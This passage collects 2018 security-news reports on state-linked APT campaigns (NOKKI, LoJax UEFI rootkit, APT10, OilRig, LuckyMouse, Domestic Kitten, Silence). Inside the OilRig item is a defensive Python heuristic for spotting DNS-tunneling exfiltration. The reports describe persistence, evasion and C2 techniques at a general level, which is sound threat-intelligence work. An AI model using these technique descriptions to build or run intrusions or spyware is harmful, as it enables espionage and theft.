FireEye, which is staffed with a roster of former military and law-enforcement cyberexperts, conducted malware analysis for a criminal indictment by the Justice Department last month against Park Jin Hyok, the first time a hacker said to be from North Korea has faced U.S. criminal charges. He’s accused of conspiring in a number of devastating cyberattacks: the Bangladesh heist and other attempts to steal more than $1 billion from financial institutions around the world; the 2014 breach of Sony Pictures Entertainment; and the WannaCry ransomware virus that in 2017 infected computers in 150 countries.

Researchers associated the recently discovered NOKKI Malware to North Korean APT
3.10.2018 securityaffairs

Security experts from Palo Alto Networks have collected evidence that links the recently discovered NOKKI malware to a North Korea-linked APT.
Researchers from Palo Alto Networks have spotted a new variant of the KONNI malware, tracked as NOKKI, that was attributed to North Korea-linked attackers.

NOKKI borrows code from the KONNI malware, a remote access Trojan (RAT) used in targeted attacks on organizations linked to North Korea, while NOKKI itself was used to target politically motivated victims in Eurasia and Southeast Asia.

KONNI went undetected for more than 3 years; it was able to avoid detection thanks to continuous evolution, with recent versions capable of executing arbitrary code on the target systems and stealing data.

The NOKKI variant has been in use since at least January 2018, and experts attributed it to the Reaper group.

“Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’.” reads the analysis published by Palo Alto Networks.

“The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks.”

NOKKI is able to gather a broad range of data (i.e. IP address, hostname, username, drive information, operating system information, installed programs) from the infected systems; it is also able to fetch and execute a payload, as well as to drop and open decoy documents.

The malicious code writes the collected information to %LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.

In January, the researchers observed several attacks involving the NOKKI malware that targeted Cambodian speakers with an interest in Cambodian political matters, and Russian speakers with documents written in Cyrillic featuring content related to local political issues.

A few days ago, researchers from Palo Alto Networks published another report that associated the NOKKI malware with the DOGCALL backdoor attributed to the Reaper group.

The analysis of the macros included in the Microsoft Word decoy documents revealed that they were designed to drop the NOKKI malware; they employed a deobfuscation technique that was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.

“Based on the original filename, we can surmise this malware sample targeted individuals interested in the World Cup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between the samples is identical, including the comments included by the author.” reads the report published by Palo Alto Networks.

NOKKI vs WordCup malware

“While the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI dropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware sample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word document to provide the lure for the victim.”

The VBScript file uses the same deobfuscation routine and fetches and executes a dropper tracked as Final1stspy, which in turn downloads a strain of the DOGCALL malware.

The malware implements backdoor features: it can take screenshots, log keystrokes, enable the microphone, collect victim information, collect files of interest, and download and execute additional payloads.

The malware connects to the command and control (C&C) via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.

“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI led us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group.” Palo Alto Networks concludes.

“Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy.”

Russian Cyberspies Use UEFI Rootkit in Attacks
27.9.2018 securityweek
APT  CyberSpy

Russian cyber-espionage group Fancy Bear is the first threat actor to have used a Unified Extensible Firmware Interface (UEFI) rootkit in a malicious campaign, ESET’s security researchers claim.

Several years ago, Italy-based surveillance software maker Hacking Team was said to have used a UEFI rootkit to ensure the persistence of its software on targeted systems, but no UEFI rootkit had “ever been detected in the wild,” the security firm claims.

A recently discovered Fancy Bear campaign, however, changes that: the actor was able to successfully deploy a malicious UEFI module on a victim’s system. Not only does this prove that UEFI rootkits are a real threat, but also shows that Fancy Bear may be even more dangerous than thought, ESET says.

Active for the past decade and a half, the actor, which is also referred to as APT28, Strontium, Sofacy and Sednit, is believed to have orchestrated a variety of high profile attacks, such as the DNC hack before the US 2016 elections.

Earlier this year, after the group’s Zebrocy malware was found on systems infected with Turla’s Mosquito backdoor, security researchers concluded that the threat actor’s activities overlap with other state-sponsored operations.

“Our investigation has determined that this malicious actor was successful at least once in writing a malicious UEFI module into a system’s SPI flash memory. This module is able to drop and execute malware on disk during the boot process. This persistence method is particularly invasive as it will not only survive an OS reinstall, but also a hard disk replacement,” ESET reveals in a report published today.

In May, Fancy Bear was revealed to have abused LoJack (a Trojanized version of the tool, which ESET calls LoJax) in their attacks. Deeper analysis of the campaign revealed not only that the actor attempted to mimic the tool’s persistence method, but also that additional tools were used for accessing and modifying UEFI/BIOS settings.

These include a kernel driver and three tools to (1) dump information about low level system settings, (2) save an image of the system firmware, and (3) add a malicious UEFI module to the image. The third tool would then write the modified firmware image back to the SPI flash memory, thus effectively installing the UEFI rootkit on the system.

“If the platform allows write operations to the SPI flash memory, it will just go ahead and write to it. If not, it actually implements an exploit against a known vulnerability,” ESET reveals.

The UEFI rootkit was designed to drop malware onto the Windows operating system partition and make sure that it is executed at startup.

The observed LoJax samples used command and control (C&C) servers previously associated with Fancy Bear’s SedUploader first-stage backdoor, which, combined with the presence of other Sednit tools on LoJax-infected machines (SedUploader, XAgent backdoor, and Xtunnel network proxy tool), suggested that this threat actor was behind the attacks.

Sednit’s UEFI rootkit, ESET discovered, is not properly signed, meaning that Secure Boot would be able to block it. The security researchers also note that the attack can write the modified firmware image only if SPI flash memory protections are vulnerable or misconfigured.

“The LoJax campaign shows that high-value targets are prime candidates for the deployment of rare, even unique threats and such targets should always be on the lookout for signs of compromise. Also, one thing that this research taught us is that it is always important to dig as deep as you can go!” ESET concludes.

Russian Sednit APT used the first ever UEFI rootkit in attacks in the wild
27.9.2018 securityaffairs

Security experts from ESET have spotted the first ever UEFI rootkit; the code, tracked as LoJax, was used in attacks in the wild.
Security researchers from ESET have discovered a new piece of sophisticated malware used by the Russia-linked Sednit group (aka Fancy Bear, APT28, Pawn Storm, Sofacy Group, and STRONTIUM) in targeted attacks aimed at government entities in the Balkans as well as in Central and Eastern Europe.

The malicious code tracked as LoJax is considered the first UEFI rootkit used in attacks in the wild.

Security experts have long debated UEFI rootkits: very dangerous malware that is hard to detect and that can survive operating system reinstallation and even hard disk replacement.

“The discovery of the first in-the-wild UEFI rootkit is notable for two reasons.” reads the analysis published by ESET.

“First, it shows that UEFI rootkits are a real threat, and not merely an attractive conference topic.

And second, it serves as a heads-up, especially to all those who might be in the crosshairs of Sednit. This APT group, also known as APT28, STRONTIUM, Sofacy and Fancy Bear, may be even more dangerous than previously thought.”

The Sednit APT group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 Presidential election.

The discovery marks a milestone in the evolution of the group: it represents an escalation in the complexity of its attacks, and the cyber capabilities of the group may be even more dangerous than previously thought.

The LoJax UEFI rootkit borrows a portion of the code of the anti-theft software LoJack.

LoJack for laptops is security software designed to catch computer thieves, but it could theoretically be abused to spy on the legitimate owners of the device.

LoJack can be used to locate a stolen laptop, lock it or wipe its content; it is a valuable application for enterprises that want to implement additional protection of their assets.

Earlier this year, experts from Arbor Networks discovered several LoJack agents connecting to servers believed to be controlled by the notorious Russia-linked Fancy Bear APT group.

“ASERT recently discovered Lojack agents containing malicious C2s. These hijacked agents pointed to suspected Fancy Bear (a.k.a. APT28, Pawn Storm) domains.” reads the report published by Netscout.

“ASERT has identified five Lojack agents (rpcnetp.exe) pointing to 4 different suspected domains. Fancy Bear has been tied to three of the domains in the past.”

Five LoJack agents discovered by the experts were pointing to four C&C servers, three of which have been associated with past campaigns conducted by the Fancy Bear APT group.

LoJax exhibits rootkit-like capabilities: it is implemented as a UEFI/BIOS module so that it survives OS reinstallation and hard drive replacement.

“Since this software’s intent is to protect a system from theft, it is important that it resists OS re-installation or hard drive replacement.” continues the report.

“Thus, it is implemented as a UEFI/BIOS module, able to survive such events. This solution comes pre-installed in the firmware of a large number of laptops manufactured by various OEMs, waiting to be activated by their owners.”

The researchers from ESET revealed that the APT group was successful at least once in writing a malicious UEFI module into a system’s SPI flash memory.

The module was abused to drop and execute the malicious code on disk during the boot process. The only way to remove the malware is reflashing the UEFI firmware.

UEFI rootkit LoJax

Moreover, cleaning a system’s UEFI firmware means re-flashing it, an operation not commonly done and certainly not by the typical user.

Experts linked the attacks to Sednit hackers thanks to the analysis of the code and the identification of the Command and Control infrastructure.

“As mentioned above, some of the LoJax small agent C&C servers were used in the past by SedUploader, a first-stage backdoor routinely used by Sednit’s operators. Also, in cases of LoJax compromise, traces of other Sednit tools were never far away.” concludes the report.

“In fact, systems targeted by LoJax usually also showed signs of these three examples of Sednit malware:

SedUploader, a first-stage backdoor
XAgent, Sednit’s flagship backdoor
Xtunnel, a network proxy tool that can relay any kind of network traffic between a C&C server on the Internet and an endpoint computer inside a local network
These facts allow us to attribute LoJax with high confidence to the Sednit group.”

The full list of Indicators of Compromise (IOCs) and samples was shared by ESET on GitHub.

China-linked APT10 group behind new attacks on the Japanese media sector
17.9.2018 securityaffairs

Recently, researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at the Japanese media sector.
In July, security researchers from FireEye uncovered and blocked a campaign carried out by the Chinese APT10 group (aka Menupass and Stone Panda) aimed at the Japanese media sector.

Experts have observed the group using PlugX, ChChes, Quasar and RedLeaves malware in targeted attacks since around mid-2016.

The group has been active at least since 2009; in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

The ANEL malware was already seen in the previous attack as a beta version or release candidate.

The spear-phishing emails have unreadable content and use titles related to maritime, diplomatic, and North Korean issues. The body of the messages includes the password needed to open the password-protected document.

The analysis of the UPPERCUT samples revealed that their timestamps were overwritten and filled with zeroes. The experts pointed out the lack of visibility into the UPPERCUT 5.2.x series, but they speculated that minor versions might have been released every few months between December 2017 and May 2018.

“The compile time of loaders in the newer version(s) are not shown here since the timestamps are overwritten and filled with zeroes. We don’t have visibility into UPPERCUT 5.2.x series, but it’s possible that minor revisions were released every few months between December 2017 and May 2018.” states the report.

“Unlike previous versions, the exported function names are randomized in the latest version.”

APT10 timeline

The latest version also implements another new feature: it sends an error code in the Cookie header when it fails to receive the HTTP response from the command and control (C&C) server.

The commands supported in the new version include: download and validate file; upload file to the C&C; load PE file; download, validate, execute file, and send output to C&C server; format the current timestamp; capture the desktop screenshot in PNG format and send it to C&C; execute received buffer via cmd.exe and send the output to the server.

“While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving,” FireEye concludes.

“In the newer versions of UPPERCUT, there is a significant change in the way the backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware.”

China-linked APT10 Hackers Update Attack Techniques
15.9.2018 securityweek APT

Recent attacks launched by the China-linked threat actor APT10 against the Japanese media sector revealed the use of updated tactics, techniques and procedures (TTPs), FireEye says.

The group, also known as menuPass and Stone Panda, has been tracked by FireEye since 2009 and has a history of targeting Japanese entities. Last year, the group targeted entities in at least fourteen countries, including the website of a prominent U.S. trade association.

The new attacks use spear-phishing emails carrying malicious Word documents that attempt to deliver the UPPERCUT backdoor. Known in the security community as ANEL, the malware was apparently in pre-release form (beta or release candidate) until recently, FireEye’s security researchers say.

The documents carry a malicious VBA macro and use Japanese titles related to maritime, diplomatic, and North Korean issues (but have unreadable contents). The documents were password protected, with the password provided in the email body.

Recent UPPERCUT samples have the timestamps overwritten and filled with zeroes and the security researchers do not have visibility into the UPPERCUT 5.2.x series, but say that minor versions might have been released every few months between December 2017 and May 2018.

The latest version also features randomized exported function names and was observed sending an error code in the Cookie header when failing to receive the HTTP response from the command and control (C&C) server. For each C&C address, the malware now has uniquely hard-coded keys it uses for encryption.

Furthermore, in the generated network traffic, the encoded proxy information has been added in the URL query values during the C&C communication, FireEye said.

The commands supported in the new version include: download and validate file; upload file to the C&C; load PE file; download, validate, execute file, and send output to C&C server; format the current timestamp; capture the desktop screenshot in PNG format and send it to C&C; execute received buffer via cmd.exe and send the output to the server.

“While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving. In the newer versions of UPPERCUT, there is a significant change in the way the backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware,” FireEye concludes.

Iran-Linked OilRig APT group targets high-ranking office in a Middle Eastern nation
14.9.2018 securityaffairs APT

Researchers from Unit 42 at Palo Alto Networks observed the Iran-linked OilRig APT group targeting a high-ranking office in a Middle Eastern nation.
The Iran-linked APT group OilRig continues to be very active, and it continues to improve the weapons in its arsenal.

The OilRig hacker group has been around since at least 2015; since then it has mainly targeted organizations in the financial and government sectors, in the United States and Middle Eastern countries.

The OilRig APT group was recently observed using a new variant of the OopsIE Trojan that implements new evasion capabilities.

Now researchers from Palo Alto Networks’s Unit 42 have uncovered a new campaign attributed to the group that targeted members of an undisclosed government in the Middle East with an evolved variant of the BondUpdater trojan.

In mid-August, the state-sponsored hackers sent a highly targeted spear-phishing email to a high-ranking office in a Middle Eastern nation.

“In August 2018, Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER. BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization.” reads the analysis published by Palo Alto Networks.

“The spear-phishing email had an attached Microsoft Word document that contained a macro responsible for installing a new variant of BONDUPDATER.”

The hackers used spear-phishing emails to deliver an updated version of the PowerShell-based BondUpdater Trojan. The BONDUPDATER Trojan implements common backdoor features such as uploading and downloading files, as well as executing commands on the infected system.

“The BondUpdater trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands,” continues the analysis published by Palo Alto Networks.

“BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.”

The spear-phishing messages use a weaponized document with a macro responsible for downloading and executing a new variant of BondUpdater.

The macro runs the VBScript “AppPool.vbs”, which creates a scheduled task that is executed every minute to ensure persistence for the BONDUPDATER Trojan.

The malware checks that only one instance of it is running at a time; it also uses a lock file to track how long the main PowerShell process has been executing.

If the main PowerShell process has been running for more than 10 minutes, the script will stop the process and delete the lock file to allow future execution of the PowerShell script.

“Future executions of the PowerShell script will fully execute as the lock file will no longer exist on the system. This suggests the threat actors may have experienced issues with this Trojan running for extended periods in the past, likely related to the communication loops that we will discuss later.” continue the experts.

OilRig APT

The BONDUPDATER Trojan also includes a new TXT-based C2 communication option: the malware implements two different variations of the DNS tunneling protocol, one using DNS A records and one using DNS TXT records, to transmit data from the command & control server to the trojan.
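Defenders cannot see the tunneled content without the malware’s encoding, but both variants share a shape in DNS logs: many queries to one zone, each with a unique, long, encoding-like left-most label. The heuristic below is an added example, not Unit 42’s code or BONDUPDATER’s real format; it profiles constructed query-log lines per (client, zone) and flags buckets that combine volume, label churn and high label entropy, reporting the TXT share separately because the Trojan also has an A-record mode.

```python
"""Heuristic DNS-tunneling detector (added example, not from the Unit 42 report).

Assumed log format (constructed): one query per line, "<ts> <client> <qtype> <qname>".
The zone "c2-placeholder.test" is a placeholder, not a real indicator.
"""
import hashlib
import math
from collections import defaultdict


def _build_sample_log():
    """Construct a small log: a little benign traffic plus one tunnel-like burst."""
    lines = []
    benign = ["www.example.com", "mail.example.com", "update.example.org",
              "cdn.example.org", "www.example.com"]
    for i, name in enumerate(benign):
        lines.append(f"2018-08-20T10:00:{i:02d} 10.0.0.5 A {name}")
    # Tunnel-like burst: 30 queries, each carrying a fresh 40-char hex label
    # (stand-in for encoded data), two thirds of them TXT lookups.
    for i in range(30):
        label = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40]
        qtype = "TXT" if i % 3 else "A"
        lines.append(f"2018-08-20T10:01:{i:02d} 10.0.0.7 {qtype} {label}.c2-placeholder.test")
    return "\n".join(lines)


SAMPLE_LOG = _build_sample_log()


def parse_line(line):
    ts, client, qtype, qname = line.split()
    return ts, client, qtype.upper(), qname.lower().rstrip(".")


def registered_domain(qname):
    # Assumption: the zone is the last two labels (no public-suffix list here).
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def shannon_entropy(s):
    """Bits per character of the label; encoded data scores far above words."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def profile(log_text):
    """Aggregate per (client, zone): query count, TXT count, distinct prefixes,
    summed prefix length and summed prefix entropy."""
    buckets = defaultdict(lambda: {"queries": 0, "txt": 0, "prefixes": set(),
                                   "len_sum": 0, "ent_sum": 0.0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, client, qtype, qname = parse_line(line)
        zone = registered_domain(qname)
        prefix = qname[:-len(zone)].rstrip(".")  # everything left of the zone
        b = buckets[(client, zone)]
        b["queries"] += 1
        b["txt"] += 1 if qtype == "TXT" else 0
        b["prefixes"].add(prefix)
        b["len_sum"] += len(prefix)
        b["ent_sum"] += shannon_entropy(prefix.replace(".", ""))
    return buckets


# Thresholds are illustrative; tune them against your own resolver logs.
THRESHOLDS = {"min_queries": 20, "min_unique_prefixes": 15,
              "min_mean_prefix_len": 20, "min_mean_entropy": 2.5,
              "min_txt_share": 0.5}


def flag_tunnels(log_text, th=THRESHOLDS):
    """Return [(client, zone, features)] for buckets that look like a tunnel."""
    findings = []
    for (client, zone), b in profile(log_text).items():
        n = b["queries"]
        feats = {"queries": n,
                 "unique_prefixes": len(b["prefixes"]),
                 "mean_prefix_len": b["len_sum"] / n,
                 "mean_entropy": b["ent_sum"] / n,
                 "txt_share": b["txt"] / n}
        # Each signal alone is weak (CDNs use long labels, SPF/DKIM use TXT),
        # so require volume, churn and encoding-like labels together.
        suspicious = (n >= th["min_queries"]
                      and feats["unique_prefixes"] >= th["min_unique_prefixes"]
                      and feats["mean_prefix_len"] >= th["min_mean_prefix_len"]
                      and feats["mean_entropy"] >= th["min_mean_entropy"])
        if suspicious:
            feats["txt_mode"] = feats["txt_share"] >= th["min_txt_share"]
            findings.append((client, zone, feats))
    return findings


if __name__ == "__main__":
    for client, zone, feats in flag_tunnels(SAMPLE_LOG):
        print(f"{client} -> {zone}: {feats}")
```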

“As expected, OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East. Sometimes developing new tools, OilRig also often uses what has worked in the past, including developing variants of previously used tools and malware. This reduces development time and capitalizes on previous versions of the tool and its success.” concluded Palo Alto Networks.

If you are interested in the Indicators of Compromise (IoCs), take a look at the analysis published by Palo Alto Networks.

Chinese LuckyMouse APT has been using a digitally signed network filtering driver in recent attacks
11.9.2018 securityaffairs APT

Security experts observed the LuckyMouse APT group using a digitally signed 32- and 64-bit network filtering driver NDISProxy in recent attacks.
Security experts from Kaspersky have observed the LuckyMouse APT group (aka Emissary Panda, APT27 and Threat Group 3390) using a digitally signed 32- and 64-bit network filtering driver NDISProxy in recent attacks.

The APT group has been active since at least 2010; the crew has targeted U.S. defense contractors and financial services firms worldwide.

In March 2018, security experts at Kaspersky Lab observed an attack powered by the Chinese APT group; the experts speculate the campaign started in the fall of 2017. The attack hit a national data center in an unnamed country in Central Asia, and according to Kaspersky the hackers were preparing a watering hole attack: they attempted to inject malicious JavaScript code into the government websites connected to the data center.

Over the past months, the group used the network filtering driver NDISProxy to inject a previously unknown Trojan into the lsass.exe system process memory.

Kaspersky reported that the driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, and the experts immediately notified the firm.

“Since March 2018 we have discovered several infections where a previously unknown Trojan was injected into the lsass.exe system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy.” reads the analysis published by Kaspersky.

“Interestingly, this driver is signed with a digital certificate that belongs to Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.”

The cyberespionage campaign analyzed by Kaspersky targeted Middle Asian government entities immediately prior to the Central Asian high-level meeting. Attackers show a specific interest in the regional political agenda.

The malware is composed of the following three modules:

A custom C++ installer that decrypts and drops the driver file in the corresponding system directory then creates a Windows autorun service to obtain driver persistence and adds the encrypted in-memory Trojan to the system registry.
A network filtering driver (NDISProxy) that decrypts and injects the Trojan into memory and filters port 3389 (Remote Desktop Protocol, RDP) traffic in order to insert the Trojan’s C2 communications into it.
The final payload, written in C++, is a Trojan acting as an HTTPS server that works together with the driver. It waits passively for communications from its C2, with two possible communication channels via ports 3389 and 443.
These modules allow the threat to move laterally but do not allow it to communicate with an external Command and Control infrastructure if the newly infected host only has a LAN IP. The operators leveraged an Earthworm SOCKS tunneler to connect the LAN of the infected host to the external C2. They also used the Scanline network scanner to find file shares (port 135, Server Message Block, SMB), which are used to spread the malware with administrative passwords compromised by keyloggers.

LuckyMouse filtering driver

The malware is distributed through already compromised networks instead of leveraging spear-phishing messages.

The dropper can install both 32-bit and 64-bit drivers, depending on the target, and keeps track of all the installation process.

The network filtering driver NDISProxy injects a RAT that can execute common tasks on the compromised system, including running commands and downloading/uploading files.

The Trojan is used by the attackers to harvest data from compromised hosts, to move laterally and to establish the connection to the C&C through SOCKS tunnels.

“This campaign appears to demonstrate once again LuckyMouse’s interest in Central Asia and the political agenda surrounding the Shanghai Cooperation Organization.” concludes Kaspersky.

Further details including IoCs are reported in the analysis published by the experts.

Domestic Kitten – An Iranian surveillance operation under the radar since 2016
10.9.2018 securityaffairs APT

CheckPoint uncovered an extensive surveillance operation conducted by an Iranian APT actor, tracked as Domestic Kitten, aimed at specific groups of individuals.
Researchers at security firm CheckPoint uncovered an extensive surveillance operation conducted by an Iranian APT actor, tracked as Domestic Kitten, aimed at specific groups of individuals.

Cyber spies used malicious mobile apps that collect sensitive information from the target device and implement specific spying features, such as recording surrounding voices.

The attackers are spying on Iranian individuals who are Kurdish and Turkish natives, as well as ISIS supporters.

“Through the use of mobile applications, those behind the attack use fake decoy content to entice their victims to download such applications, which are in fact loaded with spyware, to then collect sensitive information about them.” reads the analysis published by CheckPoint.

“Interestingly, these targets include Kurdish and Turkish natives and ISIS supporters. Most interesting of all, though, is that all these targets are actually Iranians citizens.”

The list of information collected from the compromised devices is long and includes:

contact lists
call records
text and multimedia messages
browser history and bookmarks
geographical location
recordings of nearby conversations
list of installed apps
clipboard content
data on external storage
The threat actor uses decoy applications believed to be of interest to the targets. The researchers discovered an ISIS-branded wallpaper changer, “updates” from the ANF Kurdistan news agency and a fake version of the Vidogram messaging app.

All the applications used in the campaign carry the same certificate, issued in 2016. The researchers confirmed that these extensive and targeted attacks have been going on since 2016 and, until now, have remained under the radar thanks to the artful deception of the attackers towards their targets.

The wallpaper changer aimed at ISIS supporters is designed to lure them by offering ISIS-related pictures to set as the screen background.

Domestic Kitten wallpaper_app

Data exfiltrated from the victim’s device is transferred to the C&C server via HTTP POST requests; it is encrypted with the AES algorithm and can be decrypted using a device ID that is unique to each victim.

One of the applications connects to firmwaresystemupdate[.]com, a newly registered domain that initially resolved to an Iranian IP address but later switched to a Russian one.

CheckPoint published the victim distribution: the cyberspies infected the devices of at least 240 users, most of them Iranians (97%); the remaining victims are in Afghanistan, Iraq and Great Britain.

“While the number of victims and their characteristics are detailed above, the number of people affected by this operation is actually much higher. This is due to the fact that the full contact list stored in each victim’s mobile device, including full names and at least one of their phone numbers, was also harvested by the attackers.” continues the analysis. “In addition, due to phone calls, SMS details, as well as the actual SMS messages, also recorded by the attackers, the private information of thousands of totally unrelated users has also been compromised.”

This means that the Domestic Kitten surveillance operation had collateral victims whose details were leaked from contact lists or conversations with the targets.

The researchers attributed the surveillance activity to the Iranian regime based on the political conditions in the region and the nature of the targets that pose a threat to the stability of the Government.

“Indeed, these surveillance programs are used against individuals and groups that could pose a threat to the stability of the Iranian regime. These could include internal dissidents and opposition forces, as well as ISIS advocates and the Kurdish minority settled mainly in Western Iran,” CheckPoint concludes.

CrowdStrike uncovered a new campaign of GOBLIN PANDA APT aimed at Vietnam
6.9.2018 securityaffairs APT

Researchers from security firm CrowdStrike have observed a new campaign associated with the GOBLIN PANDA APT group.
Experts from security firm CrowdStrike have uncovered a new campaign associated with the GOBLIN PANDA APT group.

The group, also known as Cycldek, was first spotted in September 2013; it mainly targeted entities in Southeast Asia using different malware variants, mainly PlugX and HttpTunnel.

In 2014, experts noticed an intensification in the activity of the group that appeared interested in the dispute over the South China Sea.

GOBLIN PANDA was focused on Vietnam, most of the targets were in the defense, energy, and government sectors.

The group is back and is once again targeting Vietnam, running a spear phishing campaign that uses weaponized documents featuring Vietnamese-language lures and themes.

“Last month, CrowdStrike Intelligence observed renewed activity from GOBLIN PANDA targeting Vietnam. As part of this campaign, new exploit documents were identified with Vietnamese-language lures and themes, as well as Vietnam-themed, adversary-controlled infrastructure.” reads the analysis published by CrowdStrike.

“Two exploit documents with Vietnamese-language file names were observed with file metadata unique to the GOBLIN PANDA adversary.”

The researchers analyzed two weaponized documents written in Vietnamese and attributed them to GOBLIN PANDA based on their metadata.

The decoy documents have training-related themes and exploit the Office vulnerability CVE-2012-0158 to deliver a malware implant tracked as QCRat by CrowdStrike Falcon Intelligence.

The documents do not specifically reference projects related to the Vietnamese government or its departments; however, they could be used to trick Government of Vietnam personnel into opening them.

According to CrowdStrike, the decoy documents use a previously identified legitimate executable, a side-loading implant Dynamic Link Library (DLL), and new implant configuration files stored as a .tlb file.

The analysis of command and control servers suggests that GOBLIN PANDA hackers are also targeting entities in Laos.

“Analysis of command and control infrastructure suggests that GOBLIN PANDA is targeting entities in Laos, as well. CrowdStrike Intelligence has not directly observed Laotian targeting, and cannot confirm targets in Laos for this campaign, however, previous activity linked to GOBLIN PANDA has targeted this country.” concludes the report.

“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region,”

Group-IB Uncovers APT attacks on Banks: The Sound of Silence
6.9.2018 securityaffairs APT

Researchers at security firm Group-IB have exposed the attacks carried out by the Silence cybercriminal group, providing details on its tactics and tools.
Experts at security firm Group-IB have exposed the attacks committed by the Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts have also discovered evidence of the group’s activity in more than 25 countries worldwide.

Group-IB has published its first detailed report “Silence: Moving into the darkside” on tactics and tools employed by the cybercriminals. Group-IB security analysts’ hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD.

After the activity of the Cobalt group declined, Silence became one of the major threats to Russian and international banks. Once known only to cybersecurity specialists, Silence is an example of a mobile, small, and young group that has been progressing rapidly. Confirmed thefts by Silence increased more than fivefold, from just 100 000 USD in 2017 to 550 000 USD in less than a year. The current confirmed total of thefts from Silence attacks stands at 800 000 USD.

For more than two years, there was not a single sign of Silence that would make it possible to identify them as an independent cybercrime group. The timeline and nature of the attacks identified by Group-IB forensic specialists strongly suggested that the first attacks were very amateur in nature and that the criminals were learning as they went along. Since autumn 2017, the group has become more active. Based on analysis and comparison with other incidents and financial APT timelines, it is clear that Silence analyses the methods of other criminal groups and applies new tactics and tools to various banking systems – AWS CBR (Automated Work Station Client of the Russian Central Bank), ATMs, and card processing.

Group-IB incident response and intelligence teams detected Silence’s activity for the very first time in 2016. Silence members attempted to withdraw money via AWS CBR; however, due to some errors in payment orders, the theft was successfully prevented. In 2017, Silence began to conduct attacks on ATMs. The first incident confirmed by Group-IB revealed that gang members stole 100 000 USD from ATMs in just one night. In 2018, they targeted card processing using a supply-chain attack, picking up 550 000 USD via ATMs of the bank’s counterpart over one weekend. In April 2018, two months after they successfully targeted card processing, the group decided to leverage its previous scheme and stole roughly 150 000 USD through ATMs. At this point, the attacks described above can be unequivocally attributed to Silence, but Group-IB security experts believe that there have been other successful attacks on banks.

Silence Group

Who are Silence?

Group-IB experts concluded that Silence is a group of Russian-speaking hackers, based on the language of their commands, the location of the infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan), although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia. Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.

There appear to be just two members in Silence—a developer and an operator. This explains why they are so selective in their attack targets, and why it takes them so long (up to 3 months, which is at least three times longer than Anunak, Buhtrap, MoneyTaker and Cobalt) to commit a theft. One gang member – the developer – has the skills of a highly experienced reverse engineer. He develops tools to conduct attacks and modifies complex exploits and software. However, in development he makes a number of errors that are quite common for virus analysts or reverse engineers; he knows exactly how to develop software, but he does not know how to program properly. The second member of the team is the operator. He has experience in penetration testing, which means he can easily find his way around banking infrastructure. He is the one who uses the developed tools to access banking systems and initiates the theft process.

Silence’s tools and methods

Like most cybercrime groups, Silence uses phishing emails. Initially, the group used hacked servers and compromised accounts for its campaigns. Later on, the criminals began to register phishing domains, for which they created self-signed certificates. Silence designs very well-crafted phishing emails usually purporting to be from bank employees. To conduct their phishing campaigns, the hackers rent servers in Russia and the Netherlands. Silence also uses Ukraine-based hosting services to rent servers to use as C&C servers. A number of servers were rented at MaxiDed, whose infrastructure was blocked by Europol in May 2018.

